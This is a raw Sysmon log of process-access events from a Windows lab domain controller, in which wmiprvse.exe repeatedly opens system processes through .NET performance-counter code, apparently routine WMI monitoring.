13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006381Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006380Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006379Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006378Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006377Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006376Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006375Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006374Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006373Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006372Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006371Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006370Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006369Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006368Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006367Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006366Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006365Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006364Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006363Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006362Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006361Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006360Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006359Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006358Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\W